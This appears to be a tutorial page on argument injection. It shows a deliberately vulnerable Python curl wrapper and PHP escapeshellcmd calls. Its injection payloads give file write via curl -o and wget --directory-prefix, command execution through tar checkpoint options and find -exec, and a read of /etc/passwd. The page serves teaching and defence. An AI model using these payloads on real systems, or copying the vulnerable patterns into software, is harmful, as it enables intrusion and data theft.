Argument injection is similar to command injection as tainted data is passed to to a command executed in a shell without proper sanitization/escaping.
It can happen in different situations, where you can only inject arguments to a command:
- Improper sanitization (regex)
- Injection of arguments into a fixed command (PHP:escapeshellcmd, Python: Popen)
- Bash expansion (ex: *)
In the following example, a python script takes the inputs from the command line to generate a curl
command:
from shlex import quote,split
import sys
import subprocess
if __name__=="__main__":
command = ['curl']
command = command + split(sys.argv[1])
print(command)
r = subprocess.Popen(command)
It is possible for an attacker to pass several words to abuse options from curl
command
python python_rce.py "https://www.google.fr -o test.py"
We can see by printing the command that all the parameters are splited allowing to inject an argument that will save the response in an arbitrary file.
['curl', 'https://www.google.fr', '-o', 'test.py']
It is possible to abuse curl
through the following options:
-o, --output <file> Write to file instead of stdout
-O, --remote-name Write output to a file named as the remote file
In case there is already one option in the command it is possible to inject several URLs to download and several output options. Each option will affect each URL in sequence.
For the tar
command it is possible to inject arbitrary arguments in different commands.
Argument injection can happen into the '''extract''' command:
--to-command <command>
--checkpoint=1 --checkpoint-action=exec=<command>
-T <file> or --files-from <file>
Or in the '''create''' command:
-I=<program> or -I <program>
--use-compres-program=<program>
There are also short options to work without spaces:
-T<file>
-I"/path/to/exec"
Find some_file inside /tmp directory.
$file = "some_file";
system("find /tmp -iname ".escapeshellcmd($file));
Print /etc/passwd content.
$file = "sth -or -exec cat /etc/passwd ; -quit";
system("find /tmp -iname ".escapeshellcmd($file));
Example of vulnerable code
system(escapeshellcmd('wget '.$url));
Arbitrary file write
$url = '--directory-prefix=/var/www/html http://example.com/example.php';